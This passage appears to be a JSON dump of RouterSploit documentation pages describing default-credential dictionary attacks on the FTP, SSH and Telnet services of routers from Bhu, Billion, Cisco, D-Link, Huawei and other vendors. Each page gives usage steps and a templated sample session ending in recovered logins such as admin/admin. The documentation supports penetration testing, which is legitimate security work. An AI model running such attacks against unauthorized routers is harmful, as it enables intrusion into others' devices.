terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/bhu/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Bhu Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/bhu/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/bhu/ftp_default_creds\nrsf (Bhu Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Bhu Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/bhu/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Bhu Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/bhu/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/bhu/ssh_default_creds\nrsf (Bhu Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Bhu Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/bhu/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Bhu Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/bhu/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/bhu/telnet_default_creds\nrsf (Bhu Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Bhu Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/billion/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Billion Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/billion/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/billion/ftp_default_creds\nrsf (Billion Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Billion Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/billion/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Billion Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/billion/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/billion/ssh_default_creds\nrsf (Billion Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Billion Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/billion/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Billion Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/billion/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/billion/telnet_default_creds\nrsf (Billion Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Billion Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/cisco/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Cisco Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/cisco/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/cisco/ftp_default_creds\nrsf (Cisco Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Cisco Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/cisco/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Cisco Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/cisco/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/cisco/ssh_default_creds\nrsf (Cisco Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Cisco Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/cisco/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Cisco Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/cisco/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/cisco/telnet_default_creds\nrsf (Cisco Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Cisco Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/comtrend/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Comtrend Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/comtrend/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/comtrend/ftp_default_creds\nrsf (Comtrend Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Comtrend Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/comtrend/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Comtrend Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/comtrend/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/comtrend/ssh_default_creds\nrsf (Comtrend Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Comtrend Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/comtrend/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Comtrend Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/comtrend/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/comtrend/telnet_default_creds\nrsf (Comtrend Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Comtrend Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/dlink/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against D-Link Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/dlink/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/dlink/ftp_default_creds\nrsf (D-Link Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (D-Link Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/dlink/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against D-Link Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/dlink/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/dlink/ssh_default_creds\nrsf (D-Link Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (D-Link Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/dlink/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against D-Link Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/dlink/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/dlink/telnet_default_creds\nrsf (D-Link Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (D-Link Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/fortinet/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Fortined Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/fortinet/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/fortinet/ftp_default_creds\nrsf (Fortinet Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Fortinet Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/fortinet/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Fortinet Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/fortinet/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/fortinet/ssh_default_creds\nrsf (Fortinet Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Fortinet Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/fortinet/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Fortinet Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/fortinet/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/fortinet/telnet_default_creds\nrsf (Fortinet Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Fortinet Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/huawei/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Huawei Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/huawei/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/huawei/ftp_default_creds\nrsf (Huawei Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Huawei Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/huawei/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Huawei Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/huawei/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/huawei/ssh_default_creds\nrsf (Huawei Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Huawei Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/huawei/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Huawei Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/huawei/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/huawei/telnet_default_creds\nrsf (Huawei Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Huawei Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/ipfire/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against IPFire Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/ipfire/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/ipfire/ftp_default_creds\nrsf (IPFire Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (IPFire Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/ipfire/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against IPFire Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/ipfire/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/ipfire/ssh_default_creds\nrsf (IPFire Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (IPFire Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/ipfire/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against IPFire Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/ipfire/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/ipfire/telnet_default_creds\nrsf (IPFire Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 